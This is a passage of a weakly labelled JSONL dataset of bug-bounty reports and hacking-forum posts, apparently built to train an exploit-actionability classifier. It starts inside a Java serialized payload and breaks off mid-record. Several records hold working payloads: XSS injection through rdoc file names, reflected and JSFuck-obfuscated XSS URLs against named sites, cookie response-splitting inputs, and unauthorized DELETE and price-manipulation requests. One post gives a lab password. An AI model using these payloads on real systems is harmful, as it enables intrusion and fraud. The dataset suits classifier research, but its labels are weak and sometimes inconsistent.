'\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x2e\\x6a\\x61\\x76\\x61\\x78\\x2e\\x6d\\x61\\x6e\\x61\\x67\\x65\\x6d\\x65\\x6e\\x74\\x2e\\x42\\x61\\x64\\x41\\x74\\x74\\x72\\x69\\x62\\x75\\x74\\x65\\x56\\x61\\x6c\\x75\\x65\\x45\\x78\\x70\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\xd4\\xe7\\xda\\xab\\x63\\x2d\\x46\\x40\\x02\\x00\\x01\\x4c\\x00\\x03\\x76\\x61\\x6c\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2017-5929"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e8639d3f0d77864b09e3", "text": "[Insecure Storage of Sensitive Information] password field autocomplete enabled\n\n## Summary:\n[Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.\nThe stored credentials can be captured by an attacker who gains control over the user's computer. Further, an attacker who finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user's browser-stored credentials.]\n\n## Platform(s) Affected:\n[both]\n\n## Steps To Reproduce:\n[follow the steps]\n\n 1. [signup with the new details]\n 1. [go to login page]\n 1. [there we will see password details are automatically filled]\n\n## Supporting Material/References:\n[none]\n\n## Impact\n\nThis autocomplete password can be sniffed without user permission", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0aab83434079754ba66c", "text": "All you have to do is actually make a short introduction on what inspired you to reverse engineer surfblocker and the steps that led you to find the fixed offset in memory of the encrypted password, and how you eventually stumbled upon using a XOR for decryption. Was it a function that was called from within the program, did you just throw shit against the wall, did a magic fairy come up from hell and give you a divine sense?I’ll tell you how I bypassed parental control when I was younger, I used ultrasurf. This was a project developed by Chinese activists that rebelled against the tyrannical ruler Hu Jintao. Mainly as a protest against the great firewall of China. The application setup encrypted tunnels to proxies out in the internet that you used as exit nodes to bypass filtering. Sound familiar?Looking forward to your read.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "zerosec", "timestamp": "2022-01-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "738113ba1df2590d6a56", "text": "I`ve been stuck at this one for a while, I get many numbers but none are right…", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-02-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "63d41658edb40966d653", "text": "Sqlmap Cheat Sheet: Commands, Options, and Advanced Features\n\nHi, Here another nice share from StationX! Enjoy!!! Sqlmap Cheat Sheet: Commands, Options, and Advanced Features StationX – 20 Oct 22 Sqlmap Cheat Sheet: Commands, Options, and Advanced Features Use this comprehensive sqlmap cheat sheet to easily lookup any command you need. It includes a special search and copy function. Download cheat sheets here: https://drive.google.com/drive/folders/132ptAPFrhVZAV5dMMK6Jk9HSA4UJl7Du", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2023-02-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "09876d5a947a249f9b8f", "text": "[Unknown] Password reset token leak on third party website via Referer header [██████████]\n\n## Summary:\n\n██████████\n\nIt has been identified that the application is leaking referrer token to third party sites. In this case it was found that the password reset token is being leaked to third party sites which is a issue knowing the fact that it can allow any malicious users to use the token and reset the passwords of the victim.\n\n##Steps To Reproduce:\n\n1) Request a password reset link for a valid account on ████████\n2) Click on the reset link from your link\n3) Before resetting the password click on the Facebook link footer section\n4) You will notice the following request in Burpsuite\n\n## Supporting Material/References:\n\n## Impact\n\nAs you can see in the referrer the reset token is getting leaked to third party sites. So, the person who has the complete control over that particular third party site can compromise the user accounts easily.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c78fb97220fff5182fba", "text": "[Unknown] ihsinme: CPP Add a query to find incorrectly used exceptions.\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3c731e4ac894727bc51e", "text": "[Improper Access Control - Generic] Any (non-admin) user from an instance can destroy any (user and/or global) external filesystem\n\n## Summary:\n\nThere is no verification of the ownership and/or its type when deleting a user-manager external storage. \nMeaning anyone on a Nextcloud instance can destroy any (user, global) external filesystem.\nThe attacker does not need to have access to the external storage.\nThe options 'Allow users to mount external storage does not need to be enabled.\n\nWhen executing the DELETE request on /apps/files_external/userstorages/ [1], the app will:\n- only check that the mount exists in database, without any condition based on the type of the storage and/or its owner [2]\n- remove all data from database related to the storage based on its id. [3]\n\n[1] https://github.com/nextcloud/server/blob/master/apps/files_external/lib/Controller/UserStoragesController.php#L234\n[2] https://github.com/nextcloud/server/blob/master/apps/files_external/lib/Service/DBConfigService.php#L67\n[3] https://github.com/nextcloud/server/blob/master/apps/files_external/lib/Service/DBConfigService.php#L274\n\n\n## Steps To Reproduce:\n\n- From an admin session, create a new external storage.\n- From a non-admin session, send a DELETE request to `/apps/files_external/userstorages/`, replace `storage_id` by the correct id (integer) of the storage.\n- From an admin session, the created external storage is not listed anymore.\n\n## Impact\n\nFilesystem can be unmounted by anyone, I have no clue how this was not reported earlier.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a8f947e0059650580f36", "text": "[HTTP Response Splitting] CGI::Cookieクラスにおけるセキュリティ上好ましくない仕様および実装\n\n以下のCGIスクリプトについて、name、path、domainに改行、等号、改行のインジェクションが可能\n\n```\n#!/usr/bin/env ruby\nrequire \"cgi\"\ncgi = CGI.new\nname = \"name\"\npath = \"/\"\ndomain = \"example.jp\"\ncookie = CGI::Cookie.new('name' => name,\n 'value' => \"value\",\n 'domain' => domain,\n 'path' => path)\ncgi.out({\"cookie\" => [cookie]}){ \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\\n\" }\n```\n(1) nameについて\nRFC2616 section-2.2 によるとCookieのnameは以下の記号および制御文字は使えないが、とくにチェックされず指定できる。\n\n> ( ) < > @ , ; : \\ \" / [ ] ? = { } \n\n例1: valueとdomain属性をインジェクション\n```\nname = \"a=b; domain=example.com;\" # # サンプルから name = の箇所を変更\n```\n結果1\n```\nSet-Cookie: a=b; domain=example.com;=value; domain=example.jp; path=/\n```\n\n例2: 改行をインジェクション\n```\nname = \"a=b;\\r\\nLocation: http://example.com#\" # サンプルから name = の箇所を変更\n```\n結果2(http://example.com にリダイレクト)\n```\nSet-Cookie: a=b;\nLocation: http://example.com#=value; domain=example.jp; path=/\n```\n\n(2) pathについて\nRFC6265によるとpath属性には制御文字および ; は使えないが、いずれもチェックされず指定できる。\n\n例3:セミコロンによる属性の追加\n```\npath = \"/; samesite=none\" # サンプルから path = の箇所を変更\n```\n結果3:samesite属性を指定できる\n```\nSet-Cookie: name=value; domain=example.jp; path=/; samesite=none\n```\n\n例4: レスポンスボディのインジェクション\n```\npath = \"/;\\r\\n\\r\\n\" # サンプルから path = の箇所を変更\n```\n\n結果4: JavaScriptの注入\n```\nHTTP/1.1 200 OK\nDate: Fri, 21 May 2021 12:08:08 GMT\nServer: Apache/2.2.31 (Unix)\nSet-Cookie: name=value; domain=example.jp; path=/;\nContent-Length: 33\nContent-Type: text/html\n\n\n\nxxxx\n```\n\n\n(3) domainについて\ndomain属性はホスト名またはドメイン名が許可されるが、セミコロン(;) や改行もチェックされず指定できる。影響はpath属性と同じなので例示は省力する。\n\n## Impact\n\nCookie設定において、外部からCookieのname、path属性、domain属性が指定できるケースはまれであるため、セキュリティ上の影響は軽微であるが、保険的にチェックされることが好ましい。PHPのsetcookie関数等ではチェックされ、不正な文字を含む場合はエラーとなり、Set-Cookie属性は出力されない。\n例外的にnameまたはpath属性、domain属性を外部から指定できる場合は、例で示したように、あらたなレスポンスヘッダあるいはレスポンスボディの追加ができ、JavaScriptの実行などXSSと同等の脅威となる。\n\nまた、RFC6265に定めるmax-age属性や最近のブラウザが対応するsamesite属性([rfc6265bis](https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis-03#section-5.3.7)など)には対応していない。samesite属性に対応していないのは実用上不便でありCookieを安全な設定にできないという意味でセキュアでもない。\n\nただし、例3で示す「裏技」によりこれら属性を指定できるが、本来はCGI::Cookieクラスの機能として提供するべきであるし、属性のインジェクションができることは望ましくない。\n\nなお、[マニュアル](https://docs.ruby-lang.org/ja/latest/class/CGI=3a=3aCookie.html)にはhttponly属性の指定方法が記載されていないが、実装はされているようである。", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f31568e89ddde0a4fa33", "text": "[Cross-site Scripting (XSS) - Stored] XSS exploit of RDoc documentation generated by rdoc\n\nWhen creating an RDoc html documentation, there is a possibility to inject malicious code through file name.\n\n# PoC\n\n```bash\n~ $ touch \\\"\\>\\Controlling\\ what\\ is\\ documented\\ here\n~ $ ls\n\">Controlling what is documented here\n~ $ rdoc --all\n```\n\nNow, the generated index file has injected javascript code:\n\n```html\n...\n
  • Controlling what is documented here.html\">"><object src=1 onerror="javascript:alert(1);">Controlling what is documented here\n...\n```\n\nI set to the vulnerability the same severity as CVE-2013-0256 has, since rdoc is widely used on dev/production systems online documentation, etc. An attacker can hide a bad-named-file deep in the project structure to be stealthy. Also, the file can be very tricky-named in documentation list, can contain the real documentation code, and so as not to arouse suspicion for some time.\n\n## Impact\n\nThe injected code can exfiltrate data or install malware on the (user|developer)’s machine, etc.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2013-0256"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1f6505f9a750de0d7732", "text": "[Cross-site Scripting (XSS) - Reflected] xss reflected - pqm.tva.com\n\nPOC:\n\nhttps://pqm.tva.com/siteminderagent/forms/smpwservices.fcc?USERNAME=\\u003cimg\\u0020src\\u003dx\\u0020onerror\\u003d\\u0022confirm(document.domain)\\u0022\\u003e&SMAUTHREASON=7\n\n## Impact\n\nWith the help of xss a hacker or attacker can perform social engineering on users by redirecting them from real website to fake one. hacker can steal their cookies and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "62edec84f4b838729711", "text": "[Classic Buffer Overflow] Buffer overflow and affected url:-https://github.com/curl/curl/blob/master/docs/examples/hsts-preload.c\n\n## Summary:\nA buffer overflow, also known as a buffer overrun, occurs when a program or process attempts to write more data to a buffer than the buffer is allocated to hold. This can happen if the program does not properly check the length of the data before writing it to the buffer, or if the program allocates too little space for the buffer.\n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n1. The hstsread function in the provided code does not properly check the length of the host string before copying it into the e->name buffer. This could lead to a buffer overflow, allowing an attacker to inject arbitrary code into the application.this could exploited by a malicious domain or website whose url should be long enough to overflow buffer as it's using strcpy function \nCondition a malicious preload host is required to exploit this if it's meet government can use it for zero click attack\n\nRecommendation:\n\nThe hstsread function should be modified to check the length of the host string before copying it into the e->name buffer. If the string is too long, the function should return an error code\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * [attachment / reference]\n\nAffected url:-https://github.com/curl/curl/blob/master/docs/examples/hsts-preload.c\nHere is the vulnerable code if attacker or government manipulate developer to add a very long domain name in hsts_preload then this will result remote code execution \n\n\n\n#include \n#include \n#include \n\nstruct entry {\n const char *name;\n const char *exp;\n};\n\nstatic const struct entry preload_hosts[] = {\n { \"example.com\", \"20370320 01:02:03\" },\n { \"curl.se\", \"20370320 03:02:01\" },\n { NULL, NULL } /* end of list marker */\n};\n\nstruct state {\n int index;\n};\n\n/* \"read\" is from the point of the library, it wants data from us. One domain\n entry per invoke. */\nstatic CURLSTScode hstsread(CURL *easy, struct curl_hstsentry *e,\n void *userp)\n{\n const char *host;\n const char *expire;\n struct state *s = (struct state *)userp;\n (void)easy;\n host = preload_hosts[s->index].name;\n expire = preload_hosts[s->index++].exp;\n\n if(host && (strlen(host) < e->namelen)) {\n strcpy(e->name, host);\n e->includeSubDomains = 0;\n strcpy(e->expire, expire);\n fprintf(stderr, \"HSTS preload '%s' until '%s'\\n\", host, expire);\n }\n else\n return CURLSTS_DONE;\n return CURLSTS_OK;\n}\n\nstatic CURLSTScode hstswrite(CURL *easy, struct curl_hstsentry *e,\n struct curl_index *i, void *userp)\n{\n (void)easy;\n (void)userp; /* we have no custom input */\n printf(\"[%u/%u] %s %s\\n\", (unsigned int)i->index, (unsigned int)i->total,\n e->name, e->expire);\n return CURLSTS_OK;\n}\n\nint main(void)\n{\n CURL *curl;\n CURLcode res;\n\n curl = curl_easy_init();\n if(curl) {\n struct state st = {0};\n\n /* enable HSTS for this handle */\n curl_easy_setopt(curl, CURLOPT_HSTS_CTRL, (long)CURLHSTS_ENABLE);\n\n /* function to call at first to populate the cache before the transfer */\n curl_easy_setopt(curl, CURLOPT_HSTSREADFUNCTION, hstsread);\n curl_easy_setopt(curl, CURLOPT_HSTSREADDATA, &st);\n\n /* function to call after transfer to store the new state of the HSTS\n cache */\n curl_easy_setopt(curl, CURLOPT_HSTSWRITEFUNCTION, hstswrite);\n curl_easy_setopt(curl, CURLOPT_HSTSWRITEDATA, NULL);\n\n /* use the domain with HTTP but due to the preload, it should do the\n transfer using HTTPS */\n curl_easy_setopt(curl, CURLOPT_URL, \"http://curl.se\");\n\n curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);\n\n /* Perform the request, res will get the return code */\n res = curl_easy_perform(curl);\n /* Check for errors */\n if(res != CURLE_OK)\n fprintf(stderr, \"curl_easy_perform() failed: %s\\n\",\n curl_easy_strerror(res));\n\n /* always cleanup */\n curl_easy_cleanup(c", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "86fbabcb9877d9febd0b", "text": "I checked on Discord and it is a different WMI command, as @hajdarevicedin mentioned. In CLI: wmic OS get SerialNumber In PowerShell: Get-WmiObject -Class Win32_OperatingSystem | select SerialNumber", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-09-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1b6d31727e35a2e0f361", "text": "[Information Disclosure] Private invitation links/tokens leak to third-party analytics site\n\n**Summary:**\nPrivate invite links are normally FILTERED before sending to third-party analytics sites. But it is seen that in few cases where the invitation link that requires users to accept NDA policy, the private invitation links are still sent to third party analytics site. \n\n\n**Steps to reproduce**\n\n1. Click on the invitation link that has NDA policy.\n2. Look for request to https://www.google-analytics.com/collect with private invitation link in the `dl` parameter.\n\nI am attaching a video PoC demonstrating the steps\n\n██████\n\n## Impact\n\n1. As seen in majority of the cases, private links are normally redacted/FILTERED by hackerone before sending to third-party analytics sites. Some links like ones in the report, miss these security validations.\n2. Leaking of private program links can be a privacy issue to the program and users.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-05", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "5b43ba5c59b41cf46bad", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected XSS Via origCity Parameter (UPPER Case + WAF Protection Bypass)\n\n##Summary\n\nThe Injection occurs on an `onsubmit` event, this will require an extra click, however this page is vulnerable to clickjacking as well, this makes a little bit more easier to exploit\n\n{F1538302}\n\n## Steps To Reproduce:\n\n1->Open\n\nhttps://www.hotwire.com/air/search-options.jsp?inputId=ext-link-disambig&rs=0&isMultiAirport=true&startDate=12%2F09%2F21&endDate=12%2F12%2F21&noOfTickets=1&origCity=xss;%27}}),%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%5b%28%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%29%5b%2b%21%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b%28%5b%5d%5b%5b%5d%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%5b%5d%5b%5b%5d%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%29%5b%2b%21%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%5d%28%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%5b%5d%5b%5b%5d%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%5b%5d%5b%5b%5d%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%2b%5b%21%5b%5d%5d%2b%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%29%5b%2b%21%2b%5b%5d%2b%5b%2b%21%2b%5b%5d%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%2b%28%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%5b%2b%21%2b%5b%5d%5d%29%29%5b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%29%5b%2b%21%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b%28%5b%5d%2b%5b%5d%29%5b%28%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%5b%28%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%5d%29%5b%2b%21%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b%28%5b%5d%5b%5b%5d%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%21%5b%5d%2b%5b%5d%29%5b%21%2b%5b%5d%2b%21%2b%5b%5d%2b%21%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%5b%5d%5d%2b%28%21%21%5b%5d%2b%5b%5d%29%5b%2b%21%2b%5b%5d%5d%2b%28%5b%5d%5b%5b%5d%5d%2b%5b%5d", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8717b18b7129d6d93013", "text": "[Improper Authentication - Generic] Security Issue into Wallet lock protection\n\n# Description\n\nWhile testing wallet extension i generally try to test multiple endpoints, so 2 tabs were open of wallet on chrome-extension://ldinpeekobnhjjdofggfgjlcehhmanlj/popup.html\n\n\nSo i tried to lock Wallet extension buti found that i can still use browser in 2nd tab, why i had already locked wallet,\n\n\nSo there is a security issue where wallet is not properly encrypted after user press lock\n\nWallet should close all open tabs of wallets and encrypt data for all tabs, It's very insecure way of password protection or lock protection\n\n\n# Steps To reproduce\n\nTo understand clearly i had created a POC video \n{F2061644}\n\n1. Open two tabs of chrome-extension://ldinpeekobnhjjdofggfgjlcehhmanlj/popup.html\n2. lock wallet in any of 1 tab and you can see you can access wallet on other tab and still able to do transaction as shown in POC{F2061648}\n\n\n# HOW to fix?\n\nEdit code and make sure when user click on lock wallet wallet should encrypt data in all tabs or close rest of the tabs to protect user and make lock protection work more securely\n\nThank you\n\n## Impact\n\nThis is totally fail of lock protection AND attacker can use this vulnerability to craft custom attacks", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3f0a61fa5fa521c4d294", "text": "[Improper Input Validation] Add more seats by paying less via PUT /v2/seats request manipulation\n\n## Summary:\nI could not fully test this vulnerability because the test plan must be completed for the payment process, that is, 30 days. But the price value in api also changes and if payment is made according to this value, wrong billing will occur.\n\nThe annual pro option for Team plan billing is $60 per seat. However, if the user enters a decimal number instead of an integer while adding a seat, the number is rounded up, but the price is only multiplied by the integer part. For example it would be like this :\n\n```javascript\nseats = 5\namount = 300\nbady.seats = 1.1\n\nseats += Math.ceil(bady.seats)\n// 5 += 2\n// seats : 7 \n\namount += Math.floor(bady.seats) * 60\n// 300 += 1 * 60\n// amount : 360 \n```\n\n## Steps To Reproduce:\n\n* Register the app and finish the installation. [help document](https://help.krisp.ai/hc/en-us/articles/360017564739-Creating-a-Krisp-personal-account)\n* Create a new team.\n* Go to billing and listen to traffic with burp.\n* Add seat and capture the request with burp.\n* Replace the number of seats with 1.9 \n* You will see that you have added 2 seats but the price has increased by $60.\n\nWe can reduce the price by adding and deleting seats.\n\nPoc video -|\n\n{F1574747}\n\n## Impact\n\nAttacker can manipulate membership price", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "dc75dd49cb9e55957e46", "text": "I figured out what we were doing wrong today. You may have received a message asking you to confirm whether you want to proceed to establish ssh connection with the host because the host is “unrecognized”. You would have had to make one of three options looking something like this “Yes/no/fingerprint”. If you saw this message, then the mistake you are making is, you are using the wrong user identity. In my case it was “htb_student” instead of “htb-student”. The underscore used in place of the hyphen was the major cause. Essentially what it might mean is that you connected to a different host who’s password is not “HTB_ @cademy_stdnt !”", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-09-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e993b559a99f634ce176", "text": "[Open Redirect] Homograph attack bypass cause redirection\n\nHi Team,\nI read the report #563268 which is a great report that was able to trick users to click on links which appears to them normal links but in fact its malicious links So I tried to find a way to make this happen again and I found out that there is a Homograph attack bypass which can redirect users to malicious sites.\n\n**Vulnerable URL:**\n```\nhttps://rinkerboats.vanillacommunities.com/home/leaving?Target=http://www.ɡооɡⅼе.ϲоⅿ\\:@%20\n```\n**Message:**\n```\nYou are now leaving Rinker Boat Company. Click the link to continue to http://www.ɡооɡⅼе.ϲоⅿ\\:@ \n```\nThis will redirect users to http://www.xn--l-r1aa78phba.xn--m-zmb38a/:@ and not http://www.google.com\nIn Homograph attack basically an attacker can change text to another and it will look like the original text for example google.com and ɡооɡⅼе.ϲоⅿ are not the same. You can know more \n\n##References:\nhttps://www.charset.org/punycode?encoded=http%3A%2F%2Fxn--eby-7cd.com%2F&decode=Punycode+to+normal+text\nhttp://www.chromium.org/developers/design-documents/idn-in-google-chrome\n\n##Similar Reports:\nhttps://hackerone.com/reports/861940\nhttps://hackerone.com/reports/29491\nhttps://hackerone.com/reports/175286\nhttps://hackerone.com/reports/271324\nhttps://hackerone.com/reports/143975\n\n## Impact\n\nRedirect users to malicious websites.\n\nRegards,\nMalek", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "14bbfe53c28ddd096e07", "text": "[Business Logic Errors] User can link non-public file attachments, leading to file disclose on edit by higher-privileged user\n\nCVSS\n----\n\nMedium 6.5 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)\n\nDescription\n-----------\n\nUploaded files can be linked to from anywhere by referencing their ID. If the user viewing the reference to the file has permission to access the file, it will be rendered. Otherwise, the reference will be displayed as text.\n\nIf a user references a file from a private location in a public location, the file permissions will silently be updated and the file will be made available publicly as well (if the user has permission to access the file; otherwise, permissions will remain unchanged).\n\nThis behavior results in problems when a higher-privileged user edits the post of a lower-privileged user which contains a reference to a private file. The file will be disclosed publicly, without the user intending this or being aware of it.\n\nPOC\n---\n\nSetup:\n\n- Create a private task (task is just one example, all components are affected by this): `/maniphest/` -> create task -> Visible to / Editable by: administrators (or some other high-privileged group).\n- Add an attachment: leave a comment -> Upload file. Note the file ID.\n\nAttack:\n\n- With a lower-privileged user, create a public task (or some other component): `/maniphest/` -> create task -> Include a reference to the private file in the description, eg `{F27}`. Include some formatting mistakes, typos, profanity, etc to entice a 